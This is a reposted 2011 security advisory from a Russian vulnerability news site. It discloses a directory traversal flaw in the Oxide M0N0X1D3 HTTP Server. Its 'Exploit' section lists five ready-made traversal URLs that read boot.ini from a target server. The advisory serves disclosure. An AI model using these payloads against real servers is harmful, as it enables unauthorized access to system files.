Информационная безопасность
[RU] switch to English


Дополнительная информация

  Обратный путь в каталогах HTTP-сервера Oxide M0N0X1D3

From:demonalex_(at)_163.com <demonalex_(at)_163.com>
Date:5 декабря 2011 г.
Subject:Oxide M0N0X1D3 HTTP Server Directory Traversal Vulnerability

Title : Oxide M0N0X1D3 HTTP Server Directory Traversal Vulnerability
Software : Oxide M0N0X1D3 HTTP Server
Software Version : 20040223
Vendor: http://sourceforge.net/projects/oxide-ws/
Vulnerability Published : 2011-11-15
Vulnerability Update Time :
Status :
Impact : Medium
Bug Description :
Oxide M0N0X1D3 HTTP Server does not properly sanitise filenames containing directory traversal sequences that are received from an HTTP Browser.
Exploit :
****************************************************************
http://target/..\..\..\boot.ini
http://target/..\\..\\..\\boot.ini
http://target/..\/..\/..\/boot.ini
http://target//..\/..\/..\boot.ini
http://target/.\..\.\..\.\..\boot.ini
.
****************************************************************
Credits : This vulnerability was discovered by demonalex(at)163(dot)com
Pentester/Researcher
Dark2S Security Team/PolyU.HK

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород